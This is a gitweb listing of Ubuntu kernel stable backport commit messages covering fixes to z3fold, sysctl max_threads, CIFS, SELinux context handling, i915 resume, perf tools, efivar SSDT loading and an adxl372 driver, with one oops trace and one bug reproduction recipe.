4 years agomm/z3fold.c: claim page in the beginning of free
Vitaly Wool [Mon, 7 Oct 2019 00:58:22 +0000 (17:58 -0700)]
mm/z3fold.c: claim page in the beginning of free

BugLink: https://bugs.launchpad.net/bugs/1848750
commit 5b6807de11445c05b537df8324f5d7ab1c2782f9 upstream.

There's a really hard to reproduce race in z3fold between z3fold_free()
and z3fold_reclaim_page().  z3fold_reclaim_page() can claim the page
after z3fold_free() has checked if the page was claimed and
z3fold_free() will then schedule this page for compaction which may in
turn lead to random page faults (since that page would have been
reclaimed by then).

Fix that by claiming page in the beginning of z3fold_free() and not
forgetting to clear the claim in the end.

[vitalywool@gmail.com: v2]
Link: http://lkml.kernel.org/r/20190928113456.152742cf@bigdell
Link: http://lkml.kernel.org/r/20190926104844.4f0c6efa1366b8f5741eaba9@gmail.com
Signed-off-by: Vitaly Wool <vitalywool@gmail.com>
Reported-by: Markus Linnala <markus.linnala@gmail.com>
Cc: Dan Streetman <ddstreet@ieee.org>
Cc: Vlastimil Babka <vbabka@suse.cz>
Cc: Henry Burns <henrywolfeburns@gmail.com>
Cc: Shakeel Butt <shakeelb@google.com>
Cc: Markus Linnala <markus.linnala@gmail.com>
Cc: <stable@vger.kernel.org>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agokernel/sysctl.c: do not override max_threads provided by userspace
Michal Hocko [Mon, 7 Oct 2019 00:58:19 +0000 (17:58 -0700)]
kernel/sysctl.c: do not override max_threads provided by userspace

BugLink: https://bugs.launchpad.net/bugs/1848750
commit b0f53dbc4bc4c371f38b14c391095a3bb8a0bb40 upstream.

Partially revert 16db3d3f1170 ("kernel/sysctl.c: threads-max observe
limits") because the patch is causing a regression to any workload which
needs to override the auto-tuning of the limit provided by kernel.

set_max_threads is implementing a boot time guesstimate to provide a
sensible limit of the concurrently running threads so that runaways will
not deplete all the memory.  This is a good thing in general but there
are workloads which might need to increase this limit for an application
to run (reportedly WebSpher MQ is affected) and that is simply not
possible after the mentioned change.  It is also very dubious to
override an admin decision by an estimation that doesn't have any direct
relation to correctness of the kernel operation.

Fix this by dropping set_max_threads from sysctl_max_threads so any
value is accepted as long as it fits into MAX_THREADS which is important
to check because allowing more threads could break internal robust futex
restriction.  While at it, do not use MIN_THREADS as the lower boundary
because it is also only a heuristic for automatic estimation and admin
might have a good reason to stop new threads to be created even when
below this limit.

This became more severe when we switched x86 from 4k to 8k kernel
stacks.  Starting since 6538b8ea886e ("x86_64: expand kernel stack to
16K") (3.16) we use THREAD_SIZE_ORDER = 2 and that halved the auto-tuned
value.

In the particular case

  3.12
  kernel.threads-max = 515561

  4.4
  kernel.threads-max = 200000

Neither of the two values is really insane on 32GB machine.

I am not sure we want/need to tune the max_thread value further.  If
anything the tuning should be removed altogether if proven not useful in
general.  But we definitely need a way to override this auto-tuning.

Link: http://lkml.kernel.org/r/20190922065801.GB18814@dhcp22.suse.cz
Fixes: 16db3d3f1170 ("kernel/sysctl.c: threads-max observe limits")
Signed-off-by: Michal Hocko <mhocko@suse.com>
Reviewed-by: "Eric W. Biederman" <ebiederm@xmission.com>
Cc: Heinrich Schuchardt <xypron.glpk@gmx.de>
Cc: <stable@vger.kernel.org>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agocifs: use cifsInodeInfo->open_file_lock while iterating to avoid a panic
Dave Wysochanski [Thu, 3 Oct 2019 05:16:27 +0000 (15:16 +1000)]
cifs: use cifsInodeInfo->open_file_lock while iterating to avoid a panic

BugLink: https://bugs.launchpad.net/bugs/1848750
commit cb248819d209d113e45fed459773991518e8e80b upstream.

Commit 487317c99477 ("cifs: add spinlock for the openFileList to
cifsInodeInfo") added cifsInodeInfo->open_file_lock spin_lock to protect
the openFileList, but missed a few places where cifs_inode->openFileList
was enumerated.  Change these remaining tcon->open_file_lock to
cifsInodeInfo->open_file_lock to avoid panic in is_size_safe_to_change.

[17313.245641] RIP: 0010:is_size_safe_to_change+0x57/0xb0 [cifs]
[17313.245645] Code: 68 40 48 89 ef e8 19 67 b7 f1 48 8b 43 40 48 8d 4b 40 48 8d 50 f0 48 39 c1 75 0f eb 47 48 8b 42 10 48 8d 50 f0 48 39 c1 74 3a <8b> 80 88 00 00 00 83 c0 01 a8 02 74 e6 48 89 ef c6 07 00 0f 1f 40
[17313.245649] RSP: 0018:ffff94ae1baefa30 EFLAGS: 00010202
[17313.245654] RAX: dead000000000100 RBX: ffff88dc72243300 RCX: ffff88dc72243340
[17313.245657] RDX: dead0000000000f0 RSI: 00000000098f7940 RDI: ffff88dd3102f040
[17313.245659] RBP: ffff88dd3102f040 R08: 0000000000000000 R09: ffff94ae1baefc40
[17313.245661] R10: ffffcdc8bb1c4e80 R11: ffffcdc8b50adb08 R12: 00000000098f7940
[17313.245663] R13: ffff88dc72243300 R14: ffff88dbc8f19600 R15: ffff88dc72243428
[17313.245667] FS:  00007fb145485700(0000) GS:ffff88dd3e000000(0000) knlGS:0000000000000000
[17313.245670] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[17313.245672] CR2: 0000026bb46c6000 CR3: 0000004edb110003 CR4: 00000000007606e0
[17313.245753] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[17313.245756] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[17313.245759] PKRU: 55555554
[17313.245761] Call Trace:
[17313.245803]  cifs_fattr_to_inode+0x16b/0x580 [cifs]
[17313.245838]  cifs_get_inode_info+0x35c/0xa60 [cifs]
[17313.245852]  ? kmem_cache_alloc_trace+0x151/0x1d0
[17313.245885]  cifs_open+0x38f/0x990 [cifs]
[17313.245921]  ? cifs_revalidate_dentry_attr+0x3e/0x350 [cifs]
[17313.245953]  ? cifsFileInfo_get+0x30/0x30 [cifs]
[17313.245960]  ? do_dentry_open+0x132/0x330
[17313.245963]  do_dentry_open+0x132/0x330
[17313.245969]  path_openat+0x573/0x14d0
[17313.245974]  do_filp_open+0x93/0x100
[17313.245979]  ? __check_object_size+0xa3/0x181
[17313.245986]  ? audit_alloc_name+0x7e/0xd0
[17313.245992]  do_sys_open+0x184/0x220
[17313.245999]  do_syscall_64+0x5b/0x1b0

Fixes: 487317c99477 ("cifs: add spinlock for the openFileList to cifsInodeInfo")
CC: Stable <stable@vger.kernel.org>
Signed-off-by: Dave Wysochanski <dwysocha@redhat.com>
Reviewed-by: Ronnie Sahlberg <lsahlber@redhat.com>
Signed-off-by: Steve French <stfrench@microsoft.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agoCIFS: Force reval dentry if LOOKUP_REVAL flag is set
Pavel Shilovsky [Mon, 30 Sep 2019 17:06:20 +0000 (10:06 -0700)]
CIFS: Force reval dentry if LOOKUP_REVAL flag is set

BugLink: https://bugs.launchpad.net/bugs/1848750
commit 0b3d0ef9840f7be202393ca9116b857f6f793715 upstream.

Mark inode for force revalidation if LOOKUP_REVAL flag is set.
This tells the client to actually send a QueryInfo request to
the server to obtain the latest metadata in case a directory
or a file were changed remotely. Only do that if the client
doesn't have a lease for the file to avoid unneeded round
trips to the server.

Cc: <stable@vger.kernel.org>
Signed-off-by: Pavel Shilovsky <pshilov@microsoft.com>
Signed-off-by: Steve French <stfrench@microsoft.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agoCIFS: Force revalidate inode when dentry is stale
Pavel Shilovsky [Mon, 30 Sep 2019 17:06:19 +0000 (10:06 -0700)]
CIFS: Force revalidate inode when dentry is stale

BugLink: https://bugs.launchpad.net/bugs/1848750
commit c82e5ac7fe3570a269c0929bf7899f62048e7dbc upstream.

Currently the client indicates that a dentry is stale when inode
numbers or type types between a local inode and a remote file
don't match. If this is the case attributes is not being copied
from remote to local, so, it is already known that the local copy
has stale metadata. That's why the inode needs to be marked for
revalidation in order to tell the VFS to lookup the dentry again
before openning a file. This prevents unexpected stale errors
to be returned to the user space when openning a file.

Cc: <stable@vger.kernel.org>
Signed-off-by: Pavel Shilovsky <pshilov@microsoft.com>
Signed-off-by: Steve French <stfrench@microsoft.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agoCIFS: Gracefully handle QueryInfo errors during open
Pavel Shilovsky [Mon, 30 Sep 2019 17:06:18 +0000 (10:06 -0700)]
CIFS: Gracefully handle QueryInfo errors during open

BugLink: https://bugs.launchpad.net/bugs/1848750
commit 30573a82fb179420b8aac30a3a3595aa96a93156 upstream.

Currently if the client identifies problems when processing
metadata returned in CREATE response, the open handle is being
leaked. This causes multiple problems like a file missing a lease
break by that client which causes high latencies to other clients
accessing the file. Another side-effect of this is that the file
can't be deleted.

Fix this by closing the file after the client hits an error after
the file was opened and the open descriptor wasn't returned to
the user space. Also convert -ESTALE to -EOPENSTALE to allow
the VFS to revalidate a dentry and retry the open.

Cc: <stable@vger.kernel.org>
Signed-off-by: Pavel Shilovsky <pshilov@microsoft.com>
Signed-off-by: Steve French <stfrench@microsoft.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agoselinux: fix context string corruption in convert_context()
Ondrej Mosnacek [Thu, 3 Oct 2019 13:59:22 +0000 (15:59 +0200)]
selinux: fix context string corruption in convert_context()

BugLink: https://bugs.launchpad.net/bugs/1848750
commit 2a5243937c700ffe6a28e6557a4562a9ab0a17a4 upstream.

string_to_context_struct() may garble the context string, so we need to
copy back the contents again from the old context struct to avoid
storing the corrupted context.

Since string_to_context_struct() tokenizes (and therefore truncates) the
context string and we are later potentially copying it with kstrdup(),
this may eventually cause pieces of uninitialized kernel memory to be
disclosed to userspace (when copying to userspace based on the stored
length and not the null character).

How to reproduce on Fedora and similar:
    # dnf install -y memcached
    # systemctl start memcached
    # semodule -d memcached
    # load_policy
    # load_policy
    # systemctl stop memcached
    # ausearch -m AVC
    type=AVC msg=audit(1570090572.648:313): avc:  denied  { signal } for  pid=1 comm="systemd" scontext=system_u:system_r:init_t:s0 tcontext=system_u:object_r:unlabeled_t:s0 tclass=process permissive=0 trawcon=73797374656D5F75007400000000000070BE6E847296FFFF726F6D000096FFFF76

Cc: stable@vger.kernel.org
Reported-by: Milos Malik <mmalik@redhat.com>
Fixes: ee1a84fdfeed ("selinux: overhaul sidtab to fix bug and improve performance")
Signed-off-by: Ondrej Mosnacek <omosnace@redhat.com>
Acked-by: Stephen Smalley <sds@tycho.nsa.gov>
Signed-off-by: Paul Moore <paul@paul-moore.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agodrm/i915: Perform GGTT restore much earlier during resume
Chris Wilson [Mon, 9 Sep 2019 11:00:08 +0000 (12:00 +0100)]
drm/i915: Perform GGTT restore much earlier during resume

BugLink: https://bugs.launchpad.net/bugs/1848750
commit 6c76a93c453643e11a1063906c7c39168dd8d163 upstream.

As soon as we re-enable the various functions within the HW, they may go
off and read data via a GGTT offset. Hence, if we have not yet restored
the GGTT PTE before then, they may read and even *write* random locations
in memory.

Detected by DMAR faults during resume.

Signed-off-by: Chris Wilson <chris@chris-wilson.co.uk>
Cc: Mika Kuoppala <mika.kuoppala@linux.intel.com>
Cc: Martin Peres <martin.peres@linux.intel.com>
Cc: Joonas Lahtinen <joonas.lahtinen@linux.intel.com>
Cc: stable@vger.kernel.org
Reviewed-by: Mika Kuoppala <mika.kuoppala@linux.intel.com>
Link: https://patchwork.freedesktop.org/patch/msgid/20190909110011.8958-4-chris@chris-wilson.co.uk
(cherry picked from commit cec5ca08e36fd18d2939b98055346b3b06f56c6c)
Signed-off-by: Rodrigo Vivi <rodrigo.vivi@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agoperf inject jit: Fix JIT_CODE_MOVE filename
Steve MacLean [Sat, 28 Sep 2019 01:41:18 +0000 (01:41 +0000)]
perf inject jit: Fix JIT_CODE_MOVE filename

BugLink: https://bugs.launchpad.net/bugs/1848750
commit b59711e9b0d22fd47abfa00602fd8c365cdd3ab7 upstream.

During perf inject --jit, JIT_CODE_MOVE records were injecting MMAP records
with an incorrect filename. Specifically it was missing the ".so" suffix.

Further the JIT_CODE_LOAD record were silently truncating the
jr->load.code_index field to 32 bits before generating the filename.

Make both records emit the same filename based on the full 64 bit
code_index field.

Fixes: 9b07e27f88b9 ("perf inject: Add jitdump mmap injection support")
Cc: stable@vger.kernel.org # v4.6+
Signed-off-by: Steve MacLean <Steve.MacLean@Microsoft.com>
Acked-by: Jiri Olsa <jolsa@kernel.org>
Cc: Alexander Shishkin <alexander.shishkin@linux.intel.com>
Cc: Andi Kleen <ak@linux.intel.com>
Cc: Brian Robbins <brianrob@microsoft.com>
Cc: Davidlohr Bueso <dave@stgolabs.net>
Cc: Eric Saint-Etienne <eric.saint.etienne@oracle.com>
Cc: John Keeping <john@metanate.com>
Cc: John Salem <josalem@microsoft.com>
Cc: Leo Yan <leo.yan@linaro.org>
Cc: Mark Rutland <mark.rutland@arm.com>
Cc: Namhyung Kim <namhyung@kernel.org>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: Song Liu <songliubraving@fb.com>
Cc: Stephane Eranian <eranian@google.com>
Cc: Tom McDonald <thomas.mcdonald@microsoft.com>
Link: http://lore.kernel.org/lkml/BN8PR21MB1362FF8F127B31DBF4121528F7800@BN8PR21MB1362.namprd21.prod.outlook.com
Signed-off-by: Arnaldo Carvalho de Melo <acme@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agoperf llvm: Don't access out-of-scope array
Ian Rogers [Thu, 26 Sep 2019 22:00:18 +0000 (15:00 -0700)]
perf llvm: Don't access out-of-scope array

BugLink: https://bugs.launchpad.net/bugs/1848750
commit 7d4c85b7035eb2f9ab217ce649dcd1bfaf0cacd3 upstream.

The 'test_dir' variable is assigned to the 'release' array which is
out-of-scope 3 lines later.

Extend the scope of the 'release' array so that an out-of-scope array
isn't accessed.

Bug detected by clang's address sanitizer.

Fixes: 07bc5c699a3d ("perf tools: Make fetch_kernel_version() publicly available")
Cc: stable@vger.kernel.org # v4.4+
Signed-off-by: Ian Rogers <irogers@google.com>
Cc: Alexander Shishkin <alexander.shishkin@linux.intel.com>
Cc: Andi Kleen <ak@linux.intel.com>
Cc: Jiri Olsa <jolsa@redhat.com>
Cc: Namhyung Kim <namhyung@kernel.org>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: Stephane Eranian <eranian@google.com>
Cc: Wang Nan <wangnan0@huawei.com>
Link: http://lore.kernel.org/lkml/20190926220018.25402-1-irogers@google.com
Signed-off-by: Arnaldo Carvalho de Melo <acme@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agoefivar/ssdt: Don't iterate over EFI vars if no SSDT override was specified
Ard Biesheuvel [Wed, 2 Oct 2019 16:58:59 +0000 (18:58 +0200)]
efivar/ssdt: Don't iterate over EFI vars if no SSDT override was specified

BugLink: https://bugs.launchpad.net/bugs/1848750
commit c05f8f92b701576b615f30aac31fabdc0648649b upstream.

The kernel command line option efivar_ssdt= allows the name to be
specified of an EFI variable containing an ACPI SSDT table that should
be loaded into memory by the OS, and treated as if it was provided by
the firmware.

Currently, that code will always iterate over the EFI variables and
compare each name with the provided name, even if the command line
option wasn't set to begin with.

So bail early when no variable name was provided. This works around a
boot regression on the 2012 Mac Pro, as reported by Scott.

Tested-by: Scott Talbert <swt@techie.net>
Signed-off-by: Ard Biesheuvel <ard.biesheuvel@linaro.org>
Cc: <stable@vger.kernel.org> # v4.9+
Cc: Ben Dooks <ben.dooks@codethink.co.uk>
Cc: Dave Young <dyoung@redhat.com>
Cc: Jarkko Sakkinen <jarkko.sakkinen@linux.intel.com>
Cc: Jerry Snitselaar <jsnitsel@redhat.com>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Lukas Wunner <lukas@wunner.de>
Cc: Lyude Paul <lyude@redhat.com>
Cc: Matthew Garrett <mjg59@google.com>
Cc: Octavian Purdila <octavian.purdila@intel.com>
Cc: Peter Jones <pjones@redhat.com>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: Thomas Gleixner <tglx@linutronix.de>
Cc: linux-efi@vger.kernel.org
Cc: linux-integrity@vger.kernel.org
Fixes: 475fb4e8b2f4 ("efi / ACPI: load SSTDs from EFI variables")
Link: https://lkml.kernel.org/r/20191002165904.8819-3-ard.biesheuvel@linaro.org
Signed-off-by: Ingo Molnar <mingo@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agoiio: accel: adxl372: Perform a reset at start up
Stefan Popa [Tue, 10 Sep 2019 14:44:46 +0000 (17:44 +0300)]
iio: accel: adxl372: Perform a reset at start up

BugLink: https://bugs.launchpad.net/bugs/1848750
commit d9a997bd4d762d5bd8cc548d762902f58b5e0a74 upstream.

We need to perform a reset a start up to make sure that the chip is in a
consistent state. This reset also disables all the interrupts which
should only be enabled together with the iio buffer. Not doing this, was
sometimes causing unwanted interrupts to trigger.

Signed-off-by: Stefan Popa <stefan.popa@analog.com>
Fixes: f4f55ce38e5f ("iio:adxl372: Add FIFO and interrupts support")
Cc: <Stable@vger.kernel.org>
Signed-off-by: Jonathan Cameron <Jonathan.Cameron@huawei.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>